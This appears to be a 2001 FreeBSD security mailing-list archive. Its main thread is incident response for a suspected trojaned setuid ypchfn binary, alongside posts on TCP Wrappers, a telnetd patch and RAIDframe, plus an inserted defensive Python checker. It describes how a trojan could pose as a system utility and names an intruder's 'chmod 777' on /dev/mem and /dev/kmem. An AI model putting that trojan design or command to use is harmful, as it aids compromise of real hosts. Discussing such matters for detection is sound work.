<20010725045845.40608.qmail@web10007.mail.yahoo.com> Date: Wed, 25 Jul 2001 12:13:38 +0200 Message-ID: <96932.996056018@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 24 Jul 2001 21:58:45 MST, David Chong wrote: > My question is: does it just cover services in inetd > (just like tcp wrappers for other unixes) or does it > cover more than that in FreeBSD? Like standalone > daemons ie. sendmail, httpd, sshd. Any service launched by inetd will be subject to TCP Wrappers if inetd is started with the -w option (default installation). You will need to check the documentation of any other services. A quick check is to use the ldd utility to check whether the binaries for the services are linked against lwrap. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 4:13: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id D7CF037B40E for ; Wed, 25 Jul 2001 04:11:09 -0700 (PDT) (envelope-from sakane@kame.net) Received: from localhost ([3ffe:501:4819:1000:260:1dff:fe1e:f7d4]) by mine.kame.net (8.11.1/3.7W) with ESMTP id f6PBGYY50269; Wed, 25 Jul 2001 20:16:34 +0900 (JST) To: ewancarr@yahoo.com Cc: FreeBSD-Security@FreeBSD.ORG Subject: Re: IKE/Racoon In-Reply-To: Your message of "Wed, 25 Jul 2001 11:00:13 +0100 (BST)" <20010725100013.15001.qmail@web13308.mail.yahoo.com> References: <20010725100013.15001.qmail@web13308.mail.yahoo.com> X-Mailer: Cue version 0.6 (010413-1707/sakane) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-Id: <20010725201105W.sakane@kame.net> Date: Wed, 25 Jul 2001 20:11:05 +0900 From: Shoichi Sakane X-Dispatcher: imput version 20000228(IM140) Lines: 
12 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ipsec wg's mailing list is suitable for asking this question. > What I dont understand is why for the pre-shared > key method of authentication you need to generate > this additional diffe hellman shared key. Does this > actually happen or is the 'formula' above just > confusing.. pre-shared key is just the one of material for authentication. IKE daemon mixes it with the shared secret of DH. the shared secret of DH is generated in each phase 1 exchange. so the mixing of them makes the decipherment attack difficult. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 6:57:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (unknown [198.92.199.5]) by hub.freebsd.org (Postfix) with ESMTP id D360D37B422 for ; Wed, 25 Jul 2001 06:56:15 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.4/8.11.4) with ESMTP id f6OHm3Q45161; Tue, 24 Jul 2001 13:48:07 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Tue, 24 Jul 2001 13:47:58 -0400 (EDT) From: Rob Simmons To: Jon Loeliger Cc: Subject: Re: Security Check Diffs Question In-Reply-To: <200107241632.LAA05639@chrome.jdl.com> Message-ID: <20010724134421.I44940-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 If you have access to the same binaries on another machine, run ident against both. If there are _no_ RCS keyword strings in the questionable binaries, there is definitely a problem. 
Robert Simmons Systems Administrator http://www.wlcg.com/ On Tue, 24 Jul 2001, Jon Loeliger wrote: > Hi Folks, > > This morning, on a machine that's been up for 33 days, > I suddenly saw these /etc/security diffs: > > setuid diffs: > 20,22c20,22 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > --- > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > 53,55c53,55 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > --- > > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > > > So, how paranoid am I here? How concerned am I? > What compromised of my system just took place? > Couple things to notice: > > - The files now take fewer 512K blocks, > but their sizes are the same? > > - Most of the inodes staid the same. Exact same. > Are these hard linked files? Should be, right? > > - The inode for ypchfn changed! > It's no longer hard linked, right? > > No form of disk restructuring, fsck, defrag, etc, was initiated by me. 
> > Note that: > > www 181 # cmp /usr/bin/{ypchpass,ypchfn} > /usr/bin/ypchpass /usr/bin/ypchfn differ: char 25, line 1 > > Here is a `strings /usr/bin/ypchfn`: > > www 182 # strings /usr/bin/ypchfn > /usr/libexec/ld-elf.so.1 > FreeBSD > libcrypt.so.2 > _DYNAMIC > _init > __deregister_frame_info > crypt > strcmp > _fini > _GLOBAL_OFFSET_TABLE_ > __register_frame_info > libc.so.4 > strerror > execl > environ > fprintf > __progname > __error > setgid > __sF > execv > getpwuid > getpwnam > atexit > exit > strchr > execvp > setuid > _etext > _edata > __bss_start > _end > 8/u > QR2cc.wsLFbKU > root > > If someone didn't hack my system, I took a disk hit and lost > part of that file, right? > > What other log files am I disecting or where else am I poking > for further evidence? > > Am I blowing away the bogus(?) /usr/bin/ypchfn and re-making > it a hard link to the others again? > > jdl > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XbTTv8Bofna59hYRA/qmAJ94c+qf42IHuHEzpc9XTomFyoE02ACgpD2V 0paUeTayTHx4/WC6YDwkWxQ= =yz9c -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 7:18:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (unknown [198.92.199.5]) by hub.freebsd.org (Postfix) with ESMTP id D360D37B422 for ; Wed, 25 Jul 2001 06:56:15 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.4/8.11.4) with ESMTP id f6OHm3Q45161; Tue, 24 Jul 2001 13:48:07 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Tue, 24 Jul 2001 13:47:58 -0400 (EDT) From: Rob Simmons To: Jon Loeliger Cc: Subject: Re: Security Check Diffs Question In-Reply-To: <200107241632.LAA05639@chrome.jdl.com> 
Message-ID: <20010724134421.I44940-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 If you have access to the same binaries on another machine, run ident against both. If there are _no_ RCS keyword strings in the questionable binaries, there is definitely a problem. Robert Simmons Systems Administrator http://www.wlcg.com/ On Tue, 24 Jul 2001, Jon Loeliger wrote: > Hi Folks, > > This morning, on a machine that's been up for 33 days, > I suddenly saw these /etc/security diffs: > > setuid diffs: > 20,22c20,22 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > --- > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > 53,55c53,55 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > --- > > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > > > So, how paranoid am I here? How concerned am I? > What compromised of my system just took place? > Couple things to notice: > > - The files now take fewer 512K blocks, > but their sizes are the same? > > - Most of the inodes staid the same. Exact same. 
> Are these hard linked files? Should be, right? > > - The inode for ypchfn changed! > It's no longer hard linked, right? > > No form of disk restructuring, fsck, defrag, etc, was initiated by me. > > Note that: > > www 181 # cmp /usr/bin/{ypchpass,ypchfn} > /usr/bin/ypchpass /usr/bin/ypchfn differ: char 25, line 1 > > Here is a `strings /usr/bin/ypchfn`: > > www 182 # strings /usr/bin/ypchfn > /usr/libexec/ld-elf.so.1 > FreeBSD > libcrypt.so.2 > _DYNAMIC > _init > __deregister_frame_info > crypt > strcmp > _fini > _GLOBAL_OFFSET_TABLE_ > __register_frame_info > libc.so.4 > strerror > execl > environ > fprintf > __progname > __error > setgid > __sF > execv > getpwuid > getpwnam > atexit > exit > strchr > execvp > setuid > _etext > _edata > __bss_start > _end > 8/u > QR2cc.wsLFbKU > root > > If someone didn't hack my system, I took a disk hit and lost > part of that file, right? > > What other log files am I disecting or where else am I poking > for further evidence? > > Am I blowing away the bogus(?) /usr/bin/ypchfn and re-making > it a hard link to the others again? 
> > jdl > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XbTTv8Bofna59hYRA/qmAJ94c+qf42IHuHEzpc9XTomFyoE02ACgpD2V 0paUeTayTHx4/WC6YDwkWxQ= =yz9c -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 7:24:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 46AC137B764 for ; Wed, 25 Jul 2001 07:21:01 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 45471 invoked by uid 1000); 25 Jul 2001 14:20:12 -0000 Date: Wed, 25 Jul 2001 17:20:12 +0300 From: Peter Pentchev To: Krzysztof Zaraska Cc: David G Andersen , Jon Loeliger , security@FreeBSD.ORG Subject: Re: Security Check Diffs Question Message-ID: <20010725172011.A44945@ringworld.oblivion.bg> Mail-Followup-To: Krzysztof Zaraska , David G Andersen , Jon Loeliger , security@FreeBSD.ORG References: <200107242359.f6ONx9U09628@faith.cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kzaraska@student.uci.agh.edu.pl on Wed, Jul 25, 2001 at 08:36:31AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jul 25, 2001 at 08:36:31AM +0200, Krzysztof Zaraska wrote: > On Tue, 24 Jul 2001, David G Andersen wrote: > > > It's probably a simple trojan with a pretty interface on it that > > says, (if username == "root", ask for their password. If crypt(input) == > > that stored password, grant access to the system). 
> I agree that this is the way this thing should work, but I was wondering: > I string original ypchfn and I see a bunch of lines like "no uid for %s" > resembling arguments for printf() so I guess that is ypchfn's user > interface. But in this trojan I can't see neither these lines nor > something resembling a path to the original ypchfn. So, my question is: > how does it masquerade to the user as original ypchfn not having it's user > interface inside? Or, maybe, the trojan contains ypchfn-like user > interface but it cannot be seen with by running strings on it? It does not need to contain any user interface to masquerade as the original. All it needs to do is check if it has been executed with a single arugment - a username, e.g. 'root', if this username is indeed the username it expects (to activate the trojan behavior), and if so, ask for password. If it has not been executed as ypchfn, or if there is more than one argument, or if the argument is not what it expects, all it needs to do is execute the original ypchfn. It knows that chpass, chfn etc are still hardlinks to the original binary, so it executes one of those - and voila, here's your "real" ypchfn for all to use, except for those who know how to invoke it. Of course, this particular trojan might not behave this way; I have only outlined one possible type of trojans masquerading as normal system utilities, and occassionally making use of the setuid bit. G'luck, Peter -- I had to translate this sentence into English because I could not read the original Sanskrit. 
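The setuid listing that /etc/security mails out can be checked mechanically instead of by eye. What follows is an added example, not code from this thread and not FreeBSD's own /etc/security script: it parses report lines in the column layout the quoted diff shows (assumed here to be `ls -liTd` output: inode, mode, link count, owner, group, size, full mtime, path), flags the two signals that matter in Jon's report (a path whose inode changed, and hard-link families whose link count dropped), and shows which paths still share an inode. The two listings are the `<` and `>` sides of the diff Jon posted; nothing else is assumed about his system.

```python
"""Flag a setuid binary that silently stopped being a hard link of its siblings.

Added example for the "Security Check Diffs" thread; not code from the thread
or from FreeBSD's /etc/security.  Input lines are assumed to be `ls -liTd`
output, which is what the quoted report looks like.
"""
import re
from collections import defaultdict

# "<" side of the diff Jon posted: the listing before the change.
BEFORE = """
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh
"""

# ">" side of the same diff: the listing after the change.
AFTER = """
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh
"""

# inode  mode  nlink  owner  group  size  "Mon DD HH:MM:SS YYYY"  path
_LS_RE = re.compile(
    r"^(?P<inode>\d+)\s+(?P<mode>[-a-zA-Z]{10})\s+(?P<nlink>\d+)\s+(?P<owner>\S+)\s+"
    r"(?P<group>\S+)\s+(?P<size>\d+)\s+"
    r"(?P<mtime>[A-Za-z]{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d\s+\d{4})\s+(?P<path>\S+)$"
)


def parse_ls_line(line):
    """Parse one `ls -liTd` line into a dict; inode, nlink and size become ints."""
    m = _LS_RE.match(line.strip())
    if not m:
        raise ValueError("not an ls -liTd line: %r" % line)
    entry = m.groupdict()
    for key in ("inode", "nlink", "size"):
        entry[key] = int(entry[key])
    return entry


def parse_listing(text):
    """Map path -> entry for every non-blank line of a listing."""
    return {e["path"]: e for e in (parse_ls_line(l) for l in text.splitlines() if l.strip())}


def inode_groups(listing):
    """Map inode -> sorted paths sharing it, i.e. the hard-link families."""
    groups = defaultdict(list)
    for path, e in listing.items():
        groups[e["inode"]].append(path)
    return {ino: sorted(paths) for ino, paths in groups.items()}


def find_anomalies(before_text, after_text):
    """Return (path, kind, detail) tuples for every change worth a second look.

    kinds: inode_changed, nlink_dropped, attr_changed, added, removed.
    """
    before, after = parse_listing(before_text), parse_listing(after_text)
    findings = []
    for path in sorted(set(before) | set(after)):
        b, a = before.get(path), after.get(path)
        if b is None:
            findings.append((path, "added", "new setuid file"))
            continue
        if a is None:
            findings.append((path, "removed", "setuid file disappeared"))
            continue
        if b["inode"] != a["inode"]:
            # The name now resolves to a different file than its former siblings:
            # this is the one to copy off the box and examine.
            findings.append((path, "inode_changed", "%d -> %d" % (b["inode"], a["inode"])))
        if a["nlink"] < b["nlink"]:
            findings.append((path, "nlink_dropped", "%d -> %d" % (b["nlink"], a["nlink"])))
        # Same size and mtime prove nothing (both are trivial to set), but a
        # change in any of these is still worth reporting.
        for key in ("mode", "owner", "group", "size"):
            if b[key] != a[key]:
                findings.append((path, "attr_changed", "%s %s -> %s" % (key, b[key], a[key])))
    return findings


def unaccounted_links(listing):
    """Paths whose link count exceeds the number of listed names on that inode.

    Every hard link of a setuid file is itself setuid, so a surplus means a
    link exists somewhere the report did not cover.
    """
    groups = inode_groups(listing)
    return sorted(p for p, e in listing.items() if e["nlink"] > len(groups[e["inode"]]))


if __name__ == "__main__":
    for path, kind, detail in find_anomalies(BEFORE, AFTER):
        print("%-20s %-14s %s" % (path, kind, detail))
    print("hard-link families after:", inode_groups(parse_listing(AFTER)))
    print("unaccounted links:", unaccounted_links(parse_listing(AFTER)))
```

Run against Jon's two listings this reports `/usr/bin/ypchfn` as the only inode change (8047 to 8270, link count 6 to 1) and a link count drop on all six names, while every remaining name still sits on inode 8047 and no link count exceeds the names seen. The identical size and mtime on the new file carry no weight, which is why the thread's advice to compare against a known-good copy (ident, a second machine, or a tripwire database on read-only media) is the right next step.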
From owner-freebsd-security Wed Jul 25 07:28:36 2001
Date: Wed, 25 Jul 2001 16:25:26 +0200
From: Michał Pasternak
To: security@freebsd.org
Subject: Re: Security Check Diffs Question
Message-ID: <20010725162525.A1735@lublin.t1.pl>
References: <200107241632.LAA05639@chrome.jdl.com> <20010724134421.I44940-100000@mail.wlcg.com>
In-Reply-To: <20010724134421.I44940-100000@mail.wlcg.com>

> > What compromise of my system just took place?

Well, I'm reading the nth post in this thread .. and I have just a few questions: What's the problem? We know that someone compromised your system's security, for sure. Why don't you download the system sources and rebuild everything (*including* ports)? Or back up your data and reinstall everything. You'll never know what rootkits and trojans the hacker could have installed. For example, I once saw a situation where a hacked FreeBSD just restarted /or halted/ without any cause... except chmod 777 on /dev/mem and /dev/kmem.

If the hacker is good, recompiling src and ports and starting with a bare /etc *won't* help.

--
[ Michal Pasternak doc@lublin.t1.pl +48606570000 ]
[ online shops, databases, custom software ]
[ . .. ..- .- . .. http://lublin.t1.pl . .-. .--.. . . .- ]

From owner-freebsd-security Wed Jul 25 07:36:08 2001
Date: Wed, 25 Jul 2001 09:10:52 -0500
From: Jon Loeliger
Message-Id: <200107251410.JAA08445@chrome.jdl.com>
To: Krzysztof Zaraska
Cc: David G Andersen, Peter Pentchev, security@FreeBSD.ORG
Subject: Re: Security Check Diffs Question
In-reply-to: Your message of "Wed, 25 Jul 2001 08:36:31 +0200."

So, like Krzysztof Zaraska was saying to me just the other day:
> On Tue, 24 Jul 2001, David G Andersen wrote:
>
> > It's probably a simple trojan with a pretty interface on it that
> > says, (if username == "root", ask for their password. If crypt(input) ==
> > that stored password, grant access to the system).
>
> I agree that this is the way this thing should work, but I was wondering:
> I ran strings on the original ypchfn and I see a bunch of lines like "no uid for %s"
> resembling arguments for printf(), so I guess that is ypchfn's user
> interface. But in this trojan I can see neither these lines nor
> something resembling a path to the original ypchfn. So, my question is:
> how does it masquerade to the user as the original ypchfn without having its user
> interface inside? Or, maybe, the trojan contains a ypchfn-like user
> interface but it cannot be seen by running strings on it?

So I'm willing to `od` this executable and send it to someone if someone is, like, seriously wanting to reverse engineer it. Or perhaps even `nm` it too. I'm personally not spending time reverse engineering it until I get a DMZ firewall in place. :-)

jdl

From owner-freebsd-security Wed Jul 25 07:35:50 2001
Date: Wed, 25 Jul 2001 09:31:09 -0500
From: "Chuck Rock"
Subject: I'm having problems getting this patch installed....
Message-ID: <005201c11516$72761690$1805010a@epconline.net>

Below is some E-mail from someone who is trying to help me. I'm having problems installing the telnetd patch on my FreeBSD 4.2 release box. Any help appreciated.

Thanks,
Chuck

-----Original Message-----
From: Chuck Rock [mailto:carock@epconline.net]
Sent: Tuesday, July 24, 2001 3:56 PM
To: Mike Tancsa
Subject: RE: telnetd root exploit

When we set them up, we use the development which is supposed to install the source code... when I ls the /usr/src/crypto, I get the following...

    README  kerberosIV/  openssl/  heimdal/  openssh/  telnet/

In this directory... /usr/src/crypto/telnet/telnetd there are the following files.

    authenc.c  global.c  state.c  telnetd.c  utility.c  defs.h  pathnames.h
    sys_term.c  telnetd.h  ext.h  slc.c  telnetd.8  termstat.c

This is FreeBSD 4.2 Release which the patch is supposed to work for as well.

Thanks for your help.
Chuck

> -----Original Message-----
> From: Mike Tancsa [mailto:mike@sentex.net]
> Sent: Tuesday, July 24, 2001 3:40 PM
> To: Chuck Rock
> Subject: RE: telnetd root exploit
>
> Do you have the source code on your server ?
>
> ---Mike
>
> At 03:40 PM 7/24/01 -0500, Chuck Rock wrote:
> >OK, I'm sorry I didn't read the entire post, but when trying the patch, I
> >get the following.
> >
> >Here's the instructions for me listed in the advisory...
> >
> ># cd /usr/src/
> ># patch -p < /path/to/patch
> ># cd /usr/src/libexec/telnetd
> ># make depend && make all install
> >
> >When I type in the patch -p line, I get...
> >
> >Hmm... Looks like a unified diff to me...
> >The text leading up to this was:
> >--------------------------
> >|Index: libexec/telnetd/ext.h
> >|===================================================================
> >|RCS file: /home/ncvs/src/libexec/telnetd/ext.h,v
> >|retrieving revision 1.8
> >|retrieving revision 1.10
> >|diff -u -r1.8 -r1.10
> >|--- libexec/telnetd/ext.h 2000/11/19 10:01:27 1.8
> >|+++ libexec/telnetd/ext.h 2001/07/23 22:00:51 1.10
> >--------------------------
> >File to patch:
> >
> >How do I answer this? I'm assuming libexec/telnetd/ext.h, but I don't want
> >to screw it up.
> >
> >Thanks,
> >Chuck
> >
> > > -----Original Message-----
> > > From: owner-freebsd-security@FreeBSD.ORG
> > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Mike Tancsa
> > > Sent: Tuesday, July 24, 2001 12:48 PM
> > > To: Chuck Rock; security@FreeBSD.ORG
> > > Subject: RE: telnetd root exploit
> > >
> > > At 12:42 PM 7/24/01 -0500, Chuck Rock wrote:
> > > >OK, is there a how to page for installing these patches? They aren't self
> > > >evident, and the search on FreeBSD.org keeps bringing up results from the
> > > >committers handbook...
> > >
> > > There are instructions in the advisory. What part are you stuck on ? i.e.
> > > post the steps you took, and where you ran into trouble.
> > >
> > > ---Mike

From owner-freebsd-security Wed Jul 25 07:55:43 2001
Date: Wed, 25 Jul 2001 17:52:57 +0300
From: Peter Pentchev
To: Chuck Rock
Cc: security@FreeBSD.ORG
Subject: Re: I'm having problems getting this patch installed....
Message-ID: <20010725175257.A47466@ringworld.oblivion.bg>
In-Reply-To: <005201c11516$72761690$1805010a@epconline.net>

On Wed, Jul 25, 2001 at 09:31:09AM -0500, Chuck Rock wrote:
> Below is some E-mail from someone who is trying to help me. I'm having
> problems installing the telnetd patch on my FreeBSD 4.2 release box.

Can you try running 'patch -p0 < /path/to/patch' instead of just '-p'?

G'luck,
Peter

--
This sentence no verb.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 8:15:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from bjapp6.163.net (unknown [202.108.255.253]) by hub.freebsd.org (Postfix) with ESMTP id 0C04837B80C for ; Wed, 25 Jul 2001 08:12:56 -0700 (PDT) (envelope-from oywand@163.net) Received: from nietzsche (unknown [202.114.1.2]) by bjapp6.163.net (Postfix) with ESMTP id 84E351C6DFC01 for ; Tue, 24 Jul 2001 09:25:50 +0800 (CST) Message-ID: <002301c113df$9dea0940$8b01010a@nietzsche> From: "oyk" To: "'FreeBSD-Questions@FreeBSD.Org'" References: <9BF54A52E1DFD311BC1000D0B73EADFE043BFE6F@bell.logica.co.uk> <20010720175826.A5207@ringworld.oblivion.bg> Subject: Raidframe hot spare question Date: Tue, 24 Jul 2001 09:24:47 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2505.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2505.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I am a FreeBSD user. I download the 2001-06-20-RAIDframe-stabel.diff.gz from your corner. I installed it and could conveniently configure the RAID0 RAID1 RAID5. Many thanks to you for bringing Raidframe to FreeBSD. But, I have a troublesome question about the RAID5 configuration with hot spare. Now I show my configuration as follow (hotspare.conf): START array 1 3 1 START disks /dev/da0s1e /dev/da1s3e /dev/da2s3e START spare /dev/da3s3e START layout 32 1 1 5 START queue fifo 100 Because I had configured two RAID5 test and used /dev/raid0 & /dev/raid1, I must use /dev/raid2 to configure. Then, I do the work as the manual of raidctl. That's OK. Everything is OK. Now, I reboot my FreeBSD box. 
The box halted, I had to reboot by hand. After reboot, I want to use the RAID5 configuration. I command "raidctl -c /etc/hotspare.conf" , but the box reboot again itself. What a strange phenomena! I tried again, the result is the same. I don't understand. Can you tell me about it? I will wait your letter. Thank you very much. yours remote friend PS: This is the RAID5 with hot spare df information: Filesystem 1K-blocks Used Avail Capacity Mounted on /dev/ad1s1a 99183 46722 44527 51% / /dev/ad1s1f 5572507 1148536 3978171 22% /usr /dev/ad1s1e 19815 770 17460 4% /var procfs 4 4 0 100% /proc /dev/raid2c 1977111 1 1818942 0% /usr/hotmnt I has test the hot spare, it succeeds. Then, I reboot, I run fsck /dev/raid2, the system information is: Can't open /dev/raid2: Device not configured then I run raidctl -c /etc/hotspare.conf, the system reboot itself, information is: Waiting for DAG engine to start Warning: p_fd fields not set Hosed component: /dev/da1s3e raid2: Component /dev/da0s1e being configured at row: 0 col:0 Row:0 Column; 0 Num Rows: 1 Num Columns: 3 Version:2 Serial Number: 123456 Mod Counter:108 Clean: Yes Status: 0 raid2: Ignoring /dev/da1s3e raid2: Component /dev/da2s3e being configured at row; 0 col: 2 Row; 0 Column: 2 Num Rows: 1 Num Columns: 3 Version:2 Serial Number: 123456 Mod Counter:108 Clean: Yes Status: 0 WARNING: truncating disk at r 0 c 1 to 2040128 blocks WARNING: truncating disk at r 0 c 2 to 2040128 blocks panic: lockmgr: pid 317, not exclusive lock holder 316 unlocking syncing disks.... 10 8 6 4 2 done Uptime: 4m16s That's all,Now, the box halt. 
From owner-freebsd-security Wed Jul 25 8:24:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from kira.epconline.net (kira2.epconline.net [209.83.132.2]) by hub.freebsd.org (Postfix) with ESMTP id 91D8837B7AA for ; Wed, 25 Jul 2001 08:23:59 -0700 (PDT) (envelope-from carock@epconline.net) Received: from therock (betterguard.epconline.net [207.206.185.193]) by kira.epconline.net (8.11.4/8.11.4) with SMTP id f6PFNwP39829 for ; Wed, 25 Jul 2001 10:23:59 -0500 (CDT) From: "Chuck Rock" To: Subject: RE: I'm having problems getting this patch installed.... Date: Wed, 25 Jul 2001 10:23:58 -0500 Message-ID: <005e01c1151d$d37f1340$1805010a@epconline.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <20010725175257.A47466@ringworld.oblivion.bg> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Same results...

kira(128):[/usr/src]-#patch -p0 < /root/sa-01.49/telnetd-crypto.patch
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: libexec/telnetd/ext.h
|===================================================================
|RCS file: /home/ncvs/src/libexec/telnetd/ext.h,v
|retrieving revision 1.8
|retrieving revision 1.10
|diff -u -r1.8 -r1.10
|--- libexec/telnetd/ext.h	2000/11/19 10:01:27	1.8
